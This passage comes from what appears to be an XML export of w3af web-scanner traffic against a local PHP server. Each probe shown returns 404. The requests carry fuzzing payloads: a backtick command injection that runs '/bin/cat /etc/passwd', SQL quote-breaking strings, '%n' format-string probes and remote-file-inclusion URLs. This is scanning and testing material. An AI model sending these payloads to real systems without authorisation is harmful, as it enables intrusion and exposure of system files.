                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="275">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="291">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/XWPfLmxj HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="304">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/a%27b%22c%27d%22 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="305">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/hTtp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="306">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="307">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/hTtp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="557" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="308">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="309">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/htTps%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="310">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/htTps%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="314">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/fTp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="315">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/fTp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="556" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="316">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%25n HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="317">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="318">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="320">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="321">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="322">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/%5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="323">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/http%3A%2F%2Fwww.w3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fwww.w3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="325">
                <httprequest>
                    <status>GET http://192.168.0.116:31337/http%3A/www.w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="Host"/>
                        <header content="http://192.168.0.116:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="192.168.0.116:31337" field="host"/>
